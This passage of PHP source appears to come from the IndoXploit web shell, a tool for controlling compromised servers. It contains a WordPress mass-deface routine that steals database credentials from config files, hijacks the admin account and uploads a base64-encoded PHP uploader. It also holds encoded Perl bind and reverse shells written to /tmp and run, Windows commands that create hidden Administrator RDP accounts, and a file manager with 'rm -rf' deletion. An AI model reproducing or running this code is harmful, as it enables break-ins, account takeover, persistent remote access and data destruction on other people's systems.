  1400. "pwd" => "$pass",
  1401. "rememberme" => "forever",
  1402. "wp-submit" => "$wp_submit",
  1403. "redirect_to" => "$web",
  1404. "testcookie" => "1",
  1405. );
  1406. $ch = curl_init($cek);
  1407. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1408. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1409. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1410. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1411. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1412. curl_setopt($ch, CURLOPT_POST, 1);
  1413. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1414. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1415. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1416. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1417. $data = curl_exec($ch);
  1418. curl_close($ch);
  1419. return $data;
  1420. }
  1421. $scan = $_POST['link_config'];
  1422. $link_config = scandir($scan);
  1423. $script = htmlspecialchars($_POST['script']);
  1424. $user = "indoxploit";
  1425. $pass = "indoxploit";
  1426. $passx = md5($pass);
  1427. foreach($link_config as $dir_config) {
  1428. if(!is_file("$scan/$dir_config")) continue;
  1429. $config = file_get_contents("$scan/$dir_config");
  1430. if(preg_match("/WordPress/", $config)) {
  1431. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1432. $dbuser = ambilkata($config,"DB_USER', '","'");
  1433. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1434. $dbname = ambilkata($config,"DB_NAME', '","'");
  1435. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1436. $prefix = $dbprefix."users";
  1437. $option = $dbprefix."options";
  1438. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1439. $db = mysql_select_db($dbname);
  1440. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1441. $result = mysql_fetch_array($q);
  1442. $id = $result[ID];
  1443. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1444. $result2 = mysql_fetch_array($q2);
  1445. $target = $result2[option_value];
  1446. if($target == '') {
  1447. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1448. } else {
  1449. echo "[+] $target <br>";
  1450. }
  1451. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1452. if(!$conn OR !$db OR !$update) {
  1453. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1454. mysql_close($conn);
  1455. } else {
  1456. $site = "$target/wp-login.php";
  1457. $site2 = "$target/wp-admin/theme-install.php?upload";
  1458. $b1 = anucurl($site2);
  1459. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1460. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1461. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1462. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1463. $www = "m.php";
  1464. $fp5 = fopen($www,"w");
  1465. fputs($fp5,$upload3);
  1466. $post2 = array(
  1467. "_wpnonce" => "$anu2",
  1468. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1469. "themezip" => "@$www",
  1470. "install-theme-submit" => "Install Now",
  1471. );
  1472. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1473. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1474. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1475. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1476. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1477. curl_setopt($ch, CURLOPT_POST, 1);
  1478. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1479. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1480. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1481. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1482. $data3 = curl_exec($ch);
  1483. curl_close($ch);
  1484. $y = date("Y");
  1485. $m = date("m");
  1486. $namafile = "id.php";
  1487. $fpi = fopen($namafile,"w");
  1488. fputs($fpi,$script);
  1489. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1490. curl_setopt($ch6, CURLOPT_POST, true);
  1491. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1492. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1493. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1494. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1495. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1496. $postResult = curl_exec($ch6);
  1497. curl_close($ch6);
  1498. $as = "$target/k.php";
  1499. $bs = anucurl($as);
  1500. if(preg_match("#$script#is", $bs)) {
  1501. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1502. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1503. } else {
  1504. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1505. echo "[!!] coba aja manual: <br>";
  1506. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1507. echo "[+] username: <font color=lime>$user</font><br>";
  1508. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1509. }
  1510. mysql_close($conn);
  1511. }
  1512. }
  1513. }
  1514. } else {
  1515. echo "<center><h1>WordPress Auto Deface</h1>
  1516. <form method='post'>
  1517. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1518. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1519. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1520. </form>
  1521. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1522. </center>";
  1523. }
  1524. } elseif($_GET['do'] == 'auto_dwp2') {
  1525. if($_POST['auto_deface_wp']) {
  1526. function anucurl($sites) {
  1527. $ch = curl_init($sites);
  1528. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1529. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1530. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1531. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1532. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1533. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1534. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1535. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1536. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1537. $data = curl_exec($ch);
  1538. curl_close($ch);
  1539. return $data;
  1540. }
  1541. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1542. $post = array(
  1543. "log" => "$userr",
  1544. "pwd" => "$pass",
  1545. "rememberme" => "forever",
  1546. "wp-submit" => "$wp_submit",
  1547. "redirect_to" => "$web",
  1548. "testcookie" => "1",
  1549. );
  1550. $ch = curl_init($cek);
  1551. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1552. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1553. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1554. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1555. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1556. curl_setopt($ch, CURLOPT_POST, 1);
  1557. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1558. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1559. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1560. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1561. $data = curl_exec($ch);
  1562. curl_close($ch);
  1563. return $data;
  1564. }
  1565. $link = explode("\r\n", $_POST['link']);
  1566. $script = htmlspecialchars($_POST['script']);
  1567. $user = "indoxploit";
  1568. $pass = "indoxploit";
  1569. $passx = md5($pass);
  1570. foreach($link as $dir_config) {
  1571. $config = anucurl($dir_config);
  1572. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1573. $dbuser = ambilkata($config,"DB_USER', '","'");
  1574. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1575. $dbname = ambilkata($config,"DB_NAME', '","'");
  1576. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1577. $prefix = $dbprefix."users";
  1578. $option = $dbprefix."options";
  1579. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1580. $db = mysql_select_db($dbname);
  1581. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1582. $result = mysql_fetch_array($q);
  1583. $id = $result[ID];
  1584. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1585. $result2 = mysql_fetch_array($q2);
  1586. $target = $result2[option_value];
  1587. if($target == '') {
  1588. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1589. } else {
  1590. echo "[+] $target <br>";
  1591. }
  1592. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1593. if(!$conn OR !$db OR !$update) {
  1594. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1595. mysql_close($conn);
  1596. } else {
  1597. $site = "$target/wp-login.php";
  1598. $site2 = "$target/wp-admin/theme-install.php?upload";
  1599. $b1 = anucurl($site2);
  1600. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1601. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1602. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1603. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1604. $www = "m.php";
  1605. $fp5 = fopen($www,"w");
  1606. fputs($fp5,$upload3);
  1607. $post2 = array(
  1608. "_wpnonce" => "$anu2",
  1609. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1610. "themezip" => "@$www",
  1611. "install-theme-submit" => "Install Now",
  1612. );
  1613. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1614. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1615. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1616. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1617. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1618. curl_setopt($ch, CURLOPT_POST, 1);
  1619. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1620. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1621. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1622. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1623. $data3 = curl_exec($ch);
  1624. curl_close($ch);
  1625. $y = date("Y");
  1626. $m = date("m");
  1627. $namafile = "id.php";
  1628. $fpi = fopen($namafile,"w");
  1629. fputs($fpi,$script);
  1630. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1631. curl_setopt($ch6, CURLOPT_POST, true);
  1632. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1633. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1634. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1635. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1636. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1637. $postResult = curl_exec($ch6);
  1638. curl_close($ch6);
  1639. $as = "$target/k.php";
  1640. $bs = anucurl($as);
  1641. if(preg_match("#$script#is", $bs)) {
  1642. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1643. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1644. } else {
  1645. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1646. echo "[!!] coba aja manual: <br>";
  1647. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1648. echo "[+] username: <font color=lime>$user</font><br>";
  1649. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1650. }
  1651. mysql_close($conn);
  1652. }
  1653. }
  1654. } else {
  1655. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1656. <form method='post'>
  1657. Link Config: <br>
  1658. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1659. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1660. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1661. </form></center>";
  1662. }
  1663. } elseif($_GET['do'] == 'network') {
  1664. echo "<form method='post'>
  1665. <u>Bind Port:</u> <br>
  1666. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  1667. <input type='submit' name='sub_bp' value='>>'>
  1668. </form>
  1669. <form method='post'>
  1670. <u>Back Connect:</u> <br>
  1671. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  1672. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  1673. <input type='submit' name='sub_bc' value='>>'>
  1674. </form>";
  1675. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1676. if(isset($_POST['sub_bp'])) {
  1677. $f_bp = fopen("/tmp/bp.pl", "w");
  1678. fwrite($f_bp, base64_decode($bind_port_p));
  1679. fclose($f_bp);
  1680.  
  1681. $port = $_POST['port_bind'];
  1682. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  1683. sleep(1);
  1684. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  1685. unlink("/tmp/bp.pl");
  1686. }
  1687. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1688. if(isset($_POST['sub_bc'])) {
  1689. $f_bc = fopen("/tmp/bc.pl", "w");
  1690. fwrite($f_bc, base64_decode($bind_connect_p));
  1691. fclose($f_bc);
  1692.  
  1693. $ipbc = $_POST['ip_bc'];
  1694. $port = $_POST['port_bc'];
  1695. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  1696. sleep(1);
  1697. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  1698. unlink("/tmp/bc.pl");
  1699. }
  1700. } elseif($_GET['do'] == 'krdp_shell') {
  1701. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1702. if($_POST['create']) {
  1703. $user = htmlspecialchars($_POST['user']);
  1704. $pass = htmlspecialchars($_POST['pass']);
  1705. if(preg_match("/$user/", exe("net user"))) {
  1706. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  1707. } else {
  1708. $add_user = exe("net user $user $pass /add");
  1709. $add_groups1 = exe("net localgroup Administrators $user /add");
  1710. $add_groups2 = exe("net localgroup Administrator $user /add");
  1711. $add_groups3 = exe("net localgroup Administrateur $user /add");
  1712. echo "[ RDP ACCOUNT INFO ]<br>
  1713. ------------------------------<br>
  1714. IP: <font color=lime>".$ip."</font><br>
  1715. Username: <font color=lime>$user</font><br>
  1716. Password: <font color=lime>$pass</font><br>
  1717. ------------------------------<br><br>
  1718. [ STATUS ]<br>
  1719. ------------------------------<br>
  1720. ";
  1721. if($add_user) {
  1722. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  1723. } else {
  1724. echo "[add user] -> <font color='red'>Gagal</font><br>";
  1725. }
  1726. if($add_groups1) {
  1727. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  1728. } elseif($add_groups2) {
  1729. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  1730. } elseif($add_groups3) {
  1731. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  1732. } else {
  1733. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1734. }
  1735. echo "------------------------------<br>";
  1736. }
  1737. } elseif($_POST['s_opsi']) {
  1738. $user = htmlspecialchars($_POST['r_user']);
  1739. if($_POST['opsi'] == '1') {
  1740. $cek = exe("net user $user");
  1741. echo "Checking username <font color=lime>$user</font> ....... ";
  1742. if(preg_match("/$user/", $cek)) {
  1743. echo "[ <font color=lime>Sudah ada</font> ]<br>
  1744. ------------------------------<br><br>
  1745. <pre>$cek</pre>";
  1746. } else {
  1747. echo "[ <font color=red>belum ada</font> ]";
  1748. }
  1749. } elseif($_POST['opsi'] == '2') {
  1750. $cek = exe("net user $user indoxploit");
  1751. if(preg_match("/$user/", exe("net user"))) {
  1752. echo "[change password: <font color=lime>indoxploit</font>] -> ";
  1753. if($cek) {
  1754. echo "<font color=lime>Berhasil</font>";
  1755. } else {
  1756. echo "<font color=red>Gagal</font>";
  1757. }
  1758. } else {
  1759. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1760. }
  1761. } elseif($_POST['opsi'] == '3') {
  1762. $cek = exe("net user $user /DELETE");
  1763. if(preg_match("/$user/", exe("net user"))) {
  1764. echo "[remove user: <font color=lime>$user</font>] -> ";
  1765. if($cek) {
  1766. echo "<font color=lime>Berhasil</font>";
  1767. } else {
  1768. echo "<font color=red>Gagal</font>";
  1769. }
  1770. } else {
  1771. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1772. }
  1773. } else {
  1774. //
  1775. }
  1776. } else {
  1777. echo "-- Create RDP --<br>
  1778. <form method='post'>
  1779. <input type='text' name='user' placeholder='username' value='indoxploit' required>
  1780. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
  1781. <input type='submit' name='create' value='>>'>
  1782. </form>
  1783. -- Option --<br>
  1784. <form method='post'>
  1785. <input type='text' name='r_user' placeholder='username' required>
  1786. <select name='opsi'>
  1787. <option value='1'>Cek Username</option>
  1788. <option value='2'>Ubah Password</option>
  1789. <option value='3'>Hapus Username</option>
  1790. </select>
  1791. <input type='submit' name='s_opsi' value='>>'>
  1792. </form>
  1793. ";
  1794. }
  1795. } else {
  1796. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1797. }
  1798. } elseif($_GET['act'] == 'newfile') {
  1799. if($_POST['new_save_file']) {
  1800. $newfile = htmlspecialchars($_POST['newfile']);
  1801. $fopen = fopen($newfile, "a+");
  1802. if($fopen) {
  1803. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1804. } else {
  1805. $act = "<font color=red>permission denied</font>";
  1806. }
  1807. }
  1808. echo $act;
  1809. echo "<form method='post'>
  1810. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1811. <input type='submit' name='new_save_file' value='Submit'>
  1812. </form>";
  1813. } elseif($_GET['act'] == 'newfolder') {
  1814. if($_POST['new_save_folder']) {
  1815. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1816. if(!mkdir($new_folder)) {
  1817. $act = "<font color=red>permission denied</font>";
  1818. } else {
  1819. $act = "<script>window.location='?dir=".$dir."';</script>";
  1820. }
  1821. }
  1822. echo $act;
  1823. echo "<form method='post'>
  1824. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1825. <input type='submit' name='new_save_folder' value='Submit'>
  1826. </form>";
  1827. } elseif($_GET['act'] == 'rename_dir') {
  1828. if($_POST['dir_rename']) {
  1829. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1830. if($dir_rename) {
  1831. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1832. } else {
  1833. $act = "<font color=red>permission denied</font>";
  1834. }
  1835. echo "".$act."<br>";
  1836. }
  1837. echo "<form method='post'>
  1838. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1839. <input type='submit' name='dir_rename' value='rename'>
  1840. </form>";
  1841. } elseif($_GET['act'] == 'delete_dir') {
  1842. if(is_dir($dir)) {
  1843. if(is_writable($dir)) {
  1844. @rmdir($dir);
  1845. @exe("rm -rf $dir");
  1846. @exe("rmdir /s /q $dir");
  1847. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1848. } else {
  1849. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1850. }
  1851. }
  1852. echo $act;
  1853. } elseif($_GET['act'] == 'view') {
  1854. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1855. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1856. } elseif($_GET['act'] == 'edit') {
  1857. if($_POST['save']) {
  1858. $save = file_put_contents($_GET['file'], $_POST['src']);
  1859. if($save) {
  1860. $act = "<font color=lime>Saved!</font>";
  1861. } else {
  1862. $act = "<font color=red>permission denied</font>";
  1863. }
  1864. echo "".$act."<br>";
  1865. }
  1866. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1867. echo "<form method='post'>
  1868. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1869. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1870. </form>";
  1871. } elseif($_GET['act'] == 'rename') {
  1872. if($_POST['do_rename']) {
  1873. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1874. if($rename) {
  1875. $act = "<script>window.location='?dir=".$dir."';</script>";
  1876. } else {
  1877. $act = "<font color=red>permission denied</font>";
  1878. }
  1879. echo "".$act."<br>";
  1880. }
  1881. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1882. echo "<form method='post'>
  1883. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1884. <input type='submit' name='do_rename' value='rename'>
  1885. </form>";
  1886. } elseif($_GET['act'] == 'delete') {
  1887. $delete = unlink($_GET['file']);
  1888. if($delete) {
  1889. $act = "<script>window.location='?dir=".$dir."';</script>";
  1890. } else {
  1891. $act = "<font color=red>permission denied</font>";
  1892. }
  1893. echo $act;
  1894. } else {
  1895. if(is_dir($dir) === true) {
  1896. if(!is_readable($dir)) {
  1897. echo "<font color=red>can't open directory. ( not readable )</font>";
  1898. } else {
  1899. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1900. <tr>
  1901. <th class="th_home"><center>Name</center></th>
  1902. <th class="th_home"><center>Type</center></th>
  1903. <th class="th_home"><center>Size</center></th>
  1904. <th class="th_home"><center>Last Modified</center></th>
  1905. <th class="th_home"><center>Owner/Group</center></th>
  1906. <th class="th_home"><center>Permission</center></th>
  1907. <th class="th_home"><center>Action</center></th>
  1908. </tr>';
  1909. $scandir = scandir($dir);
  1910. foreach($scandir as $dirx) {
  1911. $dtype = filetype("$dir/$dirx");
  1912. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1913. if(function_exists('posix_getpwuid')) {
  1914. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1915. $downer = $downer['name'];
  1916. } else {
  1917. //$downer = $uid;
  1918. $downer = fileowner("$dir/$dirx");
  1919. }
  1920. if(function_exists('posix_getgrgid')) {
  1921. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1922. $dgrp = $dgrp['name'];
  1923. } else {
  1924. $dgrp = filegroup("$dir/$dirx");
  1925. }
  1926. if(!is_dir("$dir/$dirx")) continue;
  1927. if($dirx === '..') {
  1928. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1929. } elseif($dirx === '.') {
  1930. $href = "<a href='?dir=$dir'>$dirx</a>";
  1931. } else {
  1932. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1933. }
  1934. if($dirx === '.' || $dirx === '..') {
  1935. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1936. } else {
  1937. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1938. }
  1939. echo "<tr>";
